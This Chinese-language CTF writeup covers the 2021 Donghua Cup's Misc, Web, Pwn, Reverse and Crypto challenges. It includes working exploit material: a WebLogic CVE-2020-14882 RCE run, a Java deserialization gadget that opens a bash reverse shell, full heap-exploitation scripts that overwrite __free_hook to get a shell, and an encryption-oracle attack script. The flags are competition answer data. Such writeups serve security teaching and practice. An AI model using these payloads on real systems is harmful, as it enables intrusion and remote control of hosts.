2021年全国大学生网络安全邀请赛暨第七届“东华杯“上海市大学生网络安全大赛Writeup
2021年全国大学生网络安全邀请赛暨第七届"东华杯"上海市大学网格全大赛Writeup
Misc
checkin
题目给了+AGYAbABhAGcAewBkAGgAYgBfADcAdABoAH0- 是UTF-7编码,解码得到flag
flag为:
flag{dhb_7th}
project
下载附件,解压之后发现这是道工控题目,但是解压之后里面有一个压缩包problem_bak.zip
解压得到你来了~
这里面一共有三段数据,第一段是base64编码
6KGo5oOF5YyF5paH5YyW77yM5piv6ZqP552A572R57uc56S+5Lqk5rKf6YCa55qE5aKe5aSa5Ye6
546w55qE5LiA56eN5Li75rWB5paH5YyW44CC5LiA5Liq5Lq655qE6KGo5oOF5YyF5piv5YW26ZqQ
6JeP6LW35p2l55qE55yf5oiR77yM5LiA5Liq5Zu95a6255qE6KGo5oOF5YyF6YeM6IO955yL5Yiw
6L+Z5Liq5Zu95a6255qE6KGo5oOF44CC4oCM4oCM4oCM4oCM4oCN4oCs4oCs4oCM5pyJ5pe25YCZ
77yM6KGo5oOF5YyF6KGo6L6+55qE5piv5LiN6IO96YGT56C055qE55yf5a6e5oOz5rOV5ZKM5oSf
5Y+X77yM6K+t6KiA5ZKM5paH5a2X55qE5bC95aS077yM5bCx5piv6KGo5oOF5YyF5pa95bGV55qE
56m66Ze044CCDQrooajmg4XljIXmmK/nvZHnu5zor63oqIDnmoTkuIDnp43ov5vljJbvvIzlroPn
moTkuqfnlJ/lkozmtYHooYzkuI7lhbbnibnlrprnmoTigJzigIzigIzigIzigIzigI3vu7/igI3i
gI3nlJ/lrZjnjq/looPigJ3mnInlhbPjgILlhbbov73msYLphpLnm67jgIHmlrDlpYfjgIHosJDo
sJHnrYnmlYjmnpznmoTnibnngrnvvIzigIzigIzigIzigIzigI3vu7/igIzigKzkuI7lubTovbvk
urrlvKDmiazkuKrmgKflkozmkJ7mgKrnmoTlv4PnkIbnm7jnrKbigIzigIzigIzigIzigI3vu7/i
gIzigKzjgIINCuihqOaDheWMheS5i+aJgOS7peiDveWkn+Wkp+iMg+WbtOWcsOS8oOaSre+8jOKA
jOKAjOKAjOKAjOKAje+7v+KArOKAjeaYr+WboOS4uuWFtuW8peihpeS6huaWh+Wtl+S6pOa1geea
hOaer+eHpeWSjOaAgeW6puihqOi+vuS4jeWHhuehrueahOW8seeCue+8jOacieaViOWcsOaPkOmr
mOS6huayn+mAmuaViOeOh+OAgumDqOWIhuihqOaDheWMheWFt+acieabv+S7o+aWh+Wtl+eahOWK
n+iDve+8jOKAjOKAjOKAjOKAjOKAje+7v+KAjeKAjei/mOWPr+S7peiKguecgeaJk+Wtl+aXtumX
tOKAjOKAjOKAjOKAjOKAje+7v+KAjOKAjOOAgumaj+edgOaZuuiDveaJi+acuueahOWFqOmdouaZ
ruWPiuWSjOekvuS6pOW6lOeUqOi9r+S7tueahOWkp+mHj+S9v+eUqO+8jOihqOaDheWMheW3sue7
j+mrmOmikeeOh+WcsOWHuueOsOWcqOS6uuS7rOeahOe9kee7nOiBiuWkqeWvueivneW9k+S4reOA
gg0K
解码得到:
表情包文化,是随着网络社交沟通的增多出现的一种主流文化。一个人的表情包是其隐藏起来的真我,一个国家的表情包里能看到这个国家的表情。有时候,表情包表达的是不能道破的真实想法和感受,语言和文字的尽头,就是表情包施展的空间。
表情包是网络语言的一种进化,它的产生和流行与其特定的“生存环境”有关。其追求醒目、新奇、谐谑等效果的特点,与年轻人张扬个性和搞怪的心理相符。
表情包之所以能够大范围地传播,是因为其弥补了文字交流的枯燥和态度表达不准确的弱点,有效地提高了沟通效率。部分表情包具有替代文字的功能,还可以节省打字时间。随着智能手机的全面普及和社交应用软件的大量使用,表情包已经高频率地出现在人们的网络聊天对话当中。
通过这解码得到的结果可以明显的观察到有隐藏字符
通过解0宽字符得到hurryup,很明显这应该是某个地方的密钥,但现在暂时还未遇到,继续往下看
在线解0宽字符的网址:https://330k.github.io/misc_tools/unicode_steganography.html
第二部分说了是quoted-printable加密,编码方式是,在线解密得到
其中的文字是跟第一段base64的文字相吻合的。
第三段说了是jpg图片,并且是base64加密的数据
这段base64数据是没有添加数据头的,自行补上data:image/jpg;base64,,然后转为图片得到这张图
用010打开,发现图片结尾FF D9之后是有多余的数据的
最终发现是OurSecret隐写,因为用这个软件打开,如果图片不是OurSecret隐写,那么将不会显示数据大小的
这里显示了数据的大小,也就证实了是OurSecret隐写,密钥就是第一段0宽解密出来得到的hurryup
所以flag为:
flag{f3a5dc36-ad43-d4fa-e75f-ef79e2e28ef3}
JumpJumpTiger
jump.exe打开ida,查看到hint
int main(int argc, const char **argv, const char **envp)
{
int v4[100]; // [rsp+20h] [rbp-60h]
int v5[101]; // [rsp+1B0h] [rbp+130h]
int v6; // [rsp+344h] [rbp+2C4h]
int v7; // [rsp+348h] [rbp+2C8h]
int i; // [rsp+34Ch] [rbp+2CCh]
printf("This is your hint!!!");
v7 = 0;
v6 = 0;
for (i = 0; i <= 99; ++i)
{
if (i & 1)
v4[v6++] = i;
else
v5[v7++] = i;
}
return 0;
}
大致意思,奇偶分离。
查看jump.exe内码,发现大量疑似base64编码,直接提取
/i9VjB/O4RAwA0QKSGkgZoJARAgAAABNASQUEhAEAUQgAABAABA4DA/A2AwABQD4ACAAUIDABAAAQBEnAswVUYEUBAAAQAFgBAQEUlGEBQwVwRI4BAwWcTHBBQwZ8YLsC5w5kaMcE1Q88/SsEuhCEcPAEURvEOTfFFhdwUXiERx8QBaaFaRqEtRBGsCtE7YNG+hI08dZHIxx8xfIE6xtcbiSJ3CvIrevJ/B/wWe/H9xA7f/Q2NwkBnDbAJQJUJFsBXQ9ccG1BMw74aIBCtAr4veLFQBxEKU/HShZ4ee3HChm4xefHYhk4CeAH/hN42eqHrhT...共八百万字符
直接尝试奇偶分离
file = open("in.txt")
file2 = open("out.txt","r+")
for line in file:
tmp = line
print(tmp)
s = ''
for i in range(len(tmp)):
if i & 2 == 1:
#if i % 2 == 1:
s += tmp[i]
file2.write(s)
print(len(s))
刚好拿到两串base64编码均以=号结尾
/9j/4AAQSkZJRgABAQEAAQABAAD/2wBDAAUDBAQEAwUEBAQFBQUGBwwIBwcHBw8LCwkMEQ8SEhEPERETFhwXExQaFRERGCEYGh0dHx8fExciJCIeJBweHx7/2wBDAQUFBQcGBw4ICA4eFBEUHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh7/wAARCAQ4B4ADAREAAhEBAxEB/8QAHQAAAgIDAQEBAAAAAAAAAAAAAQIAAwQFBgcICf/EAEUQAQABAwMDAwMDAwMDAwECDwECAAMRBBIhBTFBBiJR...共四百万字符
分别解码,得到了一张jpg和一张png,两张图片看起来是一样的,很明显就是盲水印了,直接使用命令:
python bwmforpy3.py decode 2.jpg 2.png flag.png
得到flag.png,打开即能看到flag
flag为:
flag{72f73bbe-9193-e59a-c593-1b1cb8f76714}
Web
apacheprOxy
打开附件,发现这是Weblogic
Weblogic有一个cve-2020-14882远程命令执行漏洞,GitHub上有现成的exp
EXP地址:https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py
因为开了反代,直接访问就进了i春秋官网了,抓个包获取一下真实的题目环境地址
使用命令:
python 1.py -u "http://47.104.100.25:7410/" -c "ls /"
然后直接cat /flag:
python 1.py -u "http://47.104.100.25:7410/" -c "cat /flag"
所以flag为:
flag{da77ef49-5958-40d5-b426-664b8299e576}
EzGadget
开始审计,IndexController.java
.....
ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
String name = objectInputStream.readUTF();
int year = objectInputStream.readInt();
if (name.equals("gadgets") && year == 2021) {
objectInputStream.readObject();
}
.....
绕过这里再输出流再
oos.writeUTF("gadgets");
oos.writeInt(2021);
就好了
ToStringBean.java
public String toString() {
ToStringBean toStringBean = new ToStringBean();
Class clazz = toStringBean.defineClass((String)null, this.ClassByte, 0, this.ClassByte.length);
Object var3 = null;
try {
var3 = clazz.newInstance();
} catch (InstantiationException var5) {
var5.printStackTrace();
} catch (IllegalAccessException var6) {
var6.printStackTrace();
}
return "enjoy it.";
}
可以看到加载了字节码,这里加载字节码的函数是toString,cc5链的BadAttributeValueExpException的readobject方法正好调用了toString,该类是jdk自带的,并且参数可控
import com.ezgame.ctf.tools.ToStringBean;
import ezgame.ctf.bean.User;
import javax.management.BadAttributeValueExpException;
import java.io.IOException;
import java.io.InputStream;
import java.lang.reflect.Field;
public class exp {
public static void main(String[] args) throws Exception {
InputStream inputStream = evil.class.getResourceAsStream("evil.class");
byte[] bytes = new byte[inputStream.available()];
inputStream.read(bytes);
ToStringBean sie =new ToStringBean();
Field bytecodes = Reflections.getField(sie.getClass(),"ClassByte");
Reflections.setAccessible(bytecodes);
Reflections.setFieldValue(sie,"ClassByte",bytes);
BadAttributeValueExpException exception = new BadAttributeValueExpException("exp");
Reflections.setFieldValue(exception,"val",sie);
String a=Serialize.serialize(exception);
System.out.print(a);
}
}
加载的字节码类
class exp{
static {
try {
Runtime.getRuntime().exec("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'");
}
catch(){
}
}
}
这里进一下if
writeUTF("gadgets");
writeInt(2021);
生成的payload可以直接打,之后vps监听收到反弹的shell
Pwn
cpp1
2.31 漏洞点在edit里 ,可以造成溢出
用0x80的chunk填满tcache后 溢出打size
造成堆快重叠,并且释放重叠的堆块进unsortedbin
然后show出libc 后面就正常的tcache attack 溢出打freehook为system getshell
Exp如下:
from pwn import*
context.log_level = "debug"
#io = process("./pwn")
io = remote("47.104.143.202","43359")
def menu(choice):
io.sendlineafter(">>",str(choice))
def add(index,size):
menu(1)
io.sendlineafter(">>",str(index))
io.sendlineafter(">>",str(size))
def edit(index,content):
menu(2)
io.sendlineafter(">>",str(index))
io.sendlineafter(">>",content)
def show(index):
menu(3)
io.sendlineafter(">>",str(index))
def delete(index):
menu(4)
io.sendlineafter(">>",str(index))
def look():
global io
gdb.attach(io)
for i in range(0,7):
add(i,0x80)
add(7,0x18)
add(8,0x50)
add(9,0x20)
add(10,0x30)
edit(7,b"a"*0x10 + p64(0) + b"\x91")
for i in range(0,7):
delete(i)
delete(8)
for i in range(0,7):
add(i,0x80)
add(8,0x50)
show(9)
info = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
malloc_hook = info - 96 - 0x10
libc = ELF("./libc-2.31.so")
libc_base = malloc_hook - libc.sym["__malloc_hook"]
free_hook = libc_base + libc.sym["__free_hook"]
success("free_hook:"+hex(free_hook))
system = libc_base + libc.sym["system"]
add(11,0x20)
add(12,0x18)
add(13,0x18)
add(14,0x18)
delete(12)
delete(14)
edit(13,p64(0)*3 + p64(0x21) + p64(free_hook))
add(14,0x18)
add(15,0x18)
edit(15,p64(system))
edit(14,"/bin/sh\x00")
delete(14)
io.interactive()
flag为:
flag{96f7801e4e658271915cf5ab3aa26ee6}
bg3
泄露libc:因为可以申请大chunk,于是
释放一个>0x420chunk 进unsortedbin 然后申请回来 直接show得到libc
get shell : 漏洞点在add里面 相同index的size可以叠加
于是通过溢出打free_hook为system get shell
Exp如下:
from pwn import*
context.log_level = "debug"
io = remote("47.104.143.202","25997")
#io = process("./pwn")
def menu(choice):
io.sendlineafter("Select:",str(choice))
def add(index,size):
menu(1)
io.sendlineafter("Index:",str(index))
io.sendlineafter(":",str(size))
def edit(index,content):
menu(2)
io.sendlineafter("Index:",str(index))
io.sendlineafter("BugInfo:",content)
def show(index):
menu(3)
io.sendlineafter("Index:",str(index))
def delete(index):
menu(4)
io.sendlineafter("Index:",str(index))
def look():
global io
gdb.attach(io)
add(0,0x420)
add(1,0x18)
delete(0)
add(0,0x420)
show(0)
info = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
print(hex(info))
libc = ELF("./libc-2.31.so",checksec = 0)
malloc_hook = info - 96 - 0x10
libc_base = malloc_hook - libc.sym["__malloc_hook"]
system = libc_base + libc.sym["system"]
free_hook = libc_base + libc.sym["__free_hook"]
add(2,0x18) #fuck!
delete(2)
add(2,0x18)
delete(2)
add(2,0x18)
delete(2)
add(2,0x18)
add(3,0x18)
add(4,0x18)
delete(4)
delete(3)
edit(2,p64(0)*4 + p64(free_hook))
add(5,0x18)
add(6,0x18)
edit(6,p64(system))
edit(5,b"/bin/sh\x00")
delete(5)
io.interactive()
flag为:
flag{7240aca686aa4bc4d7697b2d7b5c7655}
gcc2
漏洞点在Remove里,有uaf。
leak_libc : 通过uaf首先泄露堆地址
然后改tcache的fd指针指向原本地址+0x10处
再申请回来时,可以造成堆快向下的0x10溢出,溢出改size为0xe1
然后对0xe1的chunk进行edit绕过double free check
把该chunk释放7次进tcache中
再释放一次 进入unsortedbin show得到libc
最后利用uaf直接tcache attack打free_hook为system get shell.
from pwn import*
context.log_level = "debug"
#io = process("./pwn")
io = remote("47.104.143.202","15348")
def menu(choice):
io.sendlineafter(">>",str(choice))
def add(index,size):
menu(1)
io.sendlineafter(">>",str(index))
io.sendlineafter(">>",str(size))
def edit(index,content):
menu(2)
io.sendlineafter(">>",str(index))
io.sendlineafter(">>",content)
def show(index):
menu(3)
io.sendlineafter(">>",str(index))
def delete(index):
menu(4)
io.sendlineafter(">>",str(index))
def look():
global io
gdb.attach(io)
add(0,0x60)
add(1,0x60)
add(2,0x60)
add(3,0x60)
add(4,0x18)
delete(1)
edit(1,p64(0)+p64(0x71))
delete(0)
show(0)
io.recvuntil("\n")
chunk_addr = u64(io.recv(6).ljust(8,b'\x00'))
print(hex(chunk_addr))
fake_addr = chunk_addr + 0x10
print(hex(fake_addr))
edit(0,p64(fake_addr))
add(5,0x60)
add(6,0x60)
edit(6,b"a"*0x58 + b"\xe1")
for i in range(0,7):
edit(2,p64(0)*2)
delete(2)
edit(2,p64(0)*2)
delete(2)
show(2)
info = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
print(hex(info))
libc = ELF("./libc-2.31.so",checksec = 0)
malloc_hook = info - 96 - 0x10
libc_base = malloc_hook - libc.sym["__malloc_hook"]
free_hook = libc_base + libc.sym["__free_hook"]
system = libc_base + libc.sym["system"]
add(9,0x18)
add(10,0x18)
delete(9)
delete(10)
edit(10,p64(free_hook))
add(11,0x18)
add(12,0x18)
edit(12,p64(system))
add(13,0x18)
edit(13,b"/bin/sh\x00")
delete(13)
io.interactive()
flag为:
flag{c9749ef8cbfdc4fc56542daea489a71c}
boom_script
这题是c解释器有关的题,正好前一段时间有师傅给我发了类似的题,这题是uaf的漏洞,通过字符串的变换可以进行堆块的申请与释放,来进行泄露和getshell
Exp:
from pwn import*
context.log_level = "debug"
#io = process("./boom_script")
io = remote("47.104.143.202","41299")
def look():
global io
gdb.attach(io)
def shell(payload):
io.recvuntil("$")
io.sendline(str(1))
io.recvuntil('length:')
io.sendline(str(len(payload)))
io.recvuntil('code:')
io.send(payload)
def main():
#the code to leak main_arena + offset and to fuck the libc
payload="""
a="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
b=a;
a="bbbbbb";
c=0;
prints(b);
array arr[20];
arr[0]=1193046;
arr[1]=1193046;
b="asdasd";
a1="cccccccc";
a2="cccccccc";
a3="cccccccc";
a3="cccccccc";
a4="cccccccc";
a5="cccccccc";
a9="cccccccc";
tc="sssssssssssssssssssssssssssssssssssssssssssssssss";
a6="sssssssssssssssssssssssssssssssssssssssssssssssss";
a7="/bin/sh";
a8="/bin/sh";
a6="ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss";
tc="ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss";
prints("dddddd");
inputn(c);
arr[0]=c;
arr[1]=c;
tc1="sssssssssssssssssssssssssssssssssssssssssssssssss";
array arr1[1];
prints("dddddd");
inputn(c);
arr1[0]=c;
a7="aaa";
inputn(c);
"""
shell(payload)
libc_base=u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))-0x1ebbe0
libc=ELF('./libc.so.6',checksec = 0)
success("libc_base"+hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
success("free_hook:"+hex(free_hook))
success("system:"+hex(system))
#fuck the free_hook to the system
io.sendlineafter("dddddd\n",str(free_hook-0x28))
io.sendlineafter("dddddd\n",str(system))
io.interactive()
if __name__ == '__main__':
main()
flag为:
flag{35f2d3a9-bddc-9ffe-e8f7-ab999010b196}
Reverse
ooo
送分题,就是做慢了,呜呜呜
照着搞就行了,一如既往,偷懒,暴力跑
flag为:
flag{13f35663-50a4-477b-278b-b711026ff7ad}
mod
这道题关键是花指令的去除,偷偷懒,只去除算法段,丢IDA F5
好了,base魔改,懒得分析算法,直接暴力跑
flag:
flag{5a073724-8223-413d-11fa-d53b133df89e}
Hell’s Gate
刚开始拿到这题,看到了很多个0x100感觉是RC4,就很激动(秒了,秒了),根据习惯,我还是先爆破,再来分析算法,单步到如下图的时候,发现这里一直指针异常,说明有异常处理之类的东西,然后果然。。。。
跟到00416F90函数,上面有部分貌似是反调试(反正没检测到我OD,估计是检测windbg之类的),能处理就处理吧,不过多阐述。找到算法段,发现了些奇奇怪怪的东西,类似于下图还有很多种这个代码。
Retf顾名思义,能给cs寄存器赋值,而cs寄存器为23的时候代表是32位汇编模式,33的时候则是64汇编模式,所以下面的汇编代码是64位的,windbg貌似也不能调试起来(也懒得找原因,好像是异常)因为每个64位汇编call代码量普遍不多,我就用CE去看汇编代码,逐个分析功能,如下图,就是个指针赋值call,经过一段时间分析,发现是tea算法
脚本如下:
flag为:
flag{0f4d0db3-668d-d58c-abb9-eb409657eaa8}
hello
调用JNI
String2 可以用log找到
So代码
脚本如下:
raw_sign = '308202e4308201cc020101300d06092a864886f70d010105050030373116301406035504030c0d416e64726f69642044656275673110300e060355040a0c07416e64726f6964310b30090603550406130255533020170d3231303330363134333034385a180f32303531303232373134333034385a30373116301406035504030c0d416e64726f69642044656275673110300e060355040a0c07416e64726f6964310b300906035504061302555330820122300d06092a864886f70d01010105000382010f003082010a0282010100cbf2b09e4308ebb459e8841e5a7b920497fef2b349e80648f7eb35f48d40a75e7ce7945b8b42d197bec0bf177e6c9899ed707dcc4a726cb14c1a69b0c4a02474806fa73cfb10e10f7b1665021c24762b6edad65ca63cea3c72e0d4e4ca3f98301173eec3254337af1f5a11f779ecbe04d1b74d53f5835e011222155a56f97e00d75374cd93080dfa087cd356a99fe1eebf5d6d5e31846aad5252c3a17a4656e2e210ce1c7aa4d147fb8cf440a50add61bbb2ec299a2e0dab0b4504796ac3a899da553ab1d83576691ab23409d18398014b3b5eaf12e83f4d99aa09e1e4e4cae133530730c1133da2b3dee37b58eb1a5795b221ec5a8830731a41167d295f9e1b0203010001300d06092a864886f70d010105050003820101000e4740235e9cf2be33de3e06d777139cbbc5cf0622285c17da04697b8067318aaf8df0fbb4d3166f293ea15aa2592f06eb6929af063722ac9f30ad85e2c087564931d6ac65fcd5fbc864b3dc9841e039c6e1d5fbc5c2f8adf90a547bc4ebc07d387914db24451c2cc89925359bd3bb0750c7aabf9d743b1893e98bbc8ff74b24fc0b4be2dbaaf1c917bba01496d0617ffc3a4a8b7a6e79a3036298a6ebf57bb00001e43a0b242864eebb0fcec9e323144d4447c878430f18e6e358ad97566fa04d1f07b171c1476c9af5a1eba0bf6616e219c0b9e1299d09fecded24a880397f92e0f99d8951228c7770c184fd77adff943bfc8b6aa524c5f0a6d7686fe35486'
enc = [0xCA, 0xEB, 0x4A, 0x8A, 0x68, 0xE1, 0xA1, 0xEB, 0xE1, 0xEE,
0x6B, 0x84, 0xA2, 0x6D, 0x49, 0xC8, 0x8E, 0x0E, 0xCC, 0xE9,
0x45, 0xCF, 0x23, 0xCC, 0xC5, 0x4C, 0x0C, 0x85, 0xCF, 0xA9,
0x8C, 0xF6, 0xE6, 0xD6, 0x26, 0x6D, 0xAC, 0x0C, 0xAC, 0x77,
0xE0, 0x64]
for i in range(0, 42):
enc[i] = (enc[i] << 3 & 0xff) + (enc[i] >> 5 & 0xff)
flag = ""
for i in range(len(enc)):
index = i * 27 + 327
magic = ord(raw_sign[index]) + i
flag += chr(magic ^ enc[i])
print flag
flag为:
flag{d5577edd-8211-7a0e-f23a-305b0b10683f}
Crypto
BlockEncrypt
反编译,得到不完整的加密函数,可以发现是aes,然后解密
脚本如下:
from pwn import *
import hashlib
import string
s="flag{abcdef0123456789-}"
def f(a,b):
m=[]
for i in range(10):
m.append(str(i))
for i in range(26):
m.append(chr(i+0x41))
m.append(chr(i+0x61))
for i in m:
for j in m:
for k in m:
for p in m:
t=i+j+k+p+a
if(hashlib.sha256(t.encode()).hexdigest()==b):
print("find")
return t[:4]
sh=remote("47.104.183.8","47971")
sh.recvuntil(b"X+")
a=(sh.recvuntil(b")",drop=True).decode())
sh.recvuntil(b"== ")
b=(sh.recvuntil(b"\n",drop=True).decode())
sh.send(f(a,b).encode())
sh.recv()
print(sh.recv().decode())
sh.send(b'1')
sh.recv()
sh.recvuntil(b"\n",drop=True)
flag=(sh.recvuntil(b"\n[+]",drop=True))
print()
t=0
r=""
while 1:
for i in s:
m=r+i
m=m.encode()
sh.send(b'2')
sh.send(m)
sh.recv()
sh.recv()
sh.recvuntil(b"CipherText:",drop=True)
c=(sh.recvuntil(b"\n[+]",drop=True))
if(c[t]==flag[t]):
r=r+i
t+=1
print(r)
flag为:
flag{ad7e9276-de18-52b8-8c1c-3db559274f2d}